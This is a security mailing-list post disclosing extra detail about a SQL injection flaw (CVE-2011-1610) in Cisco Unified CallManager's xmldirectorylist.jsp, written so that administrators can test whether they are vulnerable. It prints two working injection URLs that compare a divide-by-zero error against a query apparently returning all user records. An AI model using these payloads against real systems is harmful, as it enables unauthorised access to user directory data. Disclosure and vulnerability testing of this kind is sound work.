Re: ZDI-11-143: Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability

[VSR Advisories <advisories () vsecurity com>]

Hello,

VSR independently discovered this SQL injection flaw (CVE-2011-1610)
and reported it to Cisco on November 11, 2010.  Since we had very
limited time to preform testing on the product, and because Cisco
informed us that another researcher had reported the same flaw shortly
before us, we decided not to write a formal advisory.

However, I would like to add some additional technical information for
those who need to test for this flaw to determine if they are
vulnerable.  

During our tests on version 7.1.3.32900-4 of the product, we found
that SQL query errors generated by attacks causes the vulnerable JSP
script to return no records, but does not present any error message.
To confirm the injection existed, the result from the following two
query URLs were compared:

 /ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20--

 /ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20--

The first URL returns a very large record set (likely all user
records) while the second query returns no records.  The only
difference between the two being the order in which '0' and '1' appear
in the query, with the latter generating a divide-by-zero error.  It
is likely that a simpler test case can be developed, but this is what
we came up with during very limited testing.  We did not explore
injections on the l and n parameters.

Thank you,
tim

http://www.vsecurity.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/